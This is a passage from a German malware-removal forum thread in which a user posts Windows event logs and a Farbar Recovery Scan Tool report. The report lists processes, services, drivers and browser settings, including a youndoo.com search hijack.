{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/20/2017 02:27:55 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.


CodeIntegrity:
===================================
  Date: 2017-05-21 20:59:59.585
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 20:59:59.549
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 20:55:53.503
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-05-21 20:48:35.581
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 17:35:59.505
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SysWOW64\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf32.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 14:50:07.831
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 14:50:07.798
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 12:28:31.255
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-21 01:33:57.070
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-20 20:19:32.035
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Prozentuale Nutzung des RAM: 32%
Installierter physikalischer RAM: 8127.12 MB
Verfügbarer physikalischer RAM: 5480.82 MB
Summe virtueller Speicher: 14527.12 MB
Verfügbarer virtueller Speicher: 11585.11 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:147.41 GB) NTFS
Drive d: () (Fixed) (Total:931.51 GB) (Free:620.58 GB) NTFS
Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
         


Alt 21.05.2017, 21:18   #6
M-K-D-B
/// TB-Ausbilder
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Ich bitte um Beachtung meiner Hinweise, insbesondere Punkt 6.
__________________
--> Trojaner, Adware oder sonstiges ?

Alt 21.05.2017, 21:25   #7
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Jetzt nochmal richtig.


Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017
durchgeführt von Dino (Administrator) auf **** (21-05-2017 21:24:07)
Gestartet von C:\Users\Dino\Desktop
Geladene Profile: Dino (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Hammer & Chisel, Inc.) C:\Users\Dino\AppData\Local\Discord\app-0.0.297\Discord.exe
(Hammer & Chisel, Inc.) C:\Users\Dino\AppData\Local\Discord\app-0.0.297\Discord.exe
(Hammer & Chisel, Inc.) C:\Users\Dino\AppData\Local\Discord\app-0.0.297\Discord.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe" 
GroupPolicyScripts-x32: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)

FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-21]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
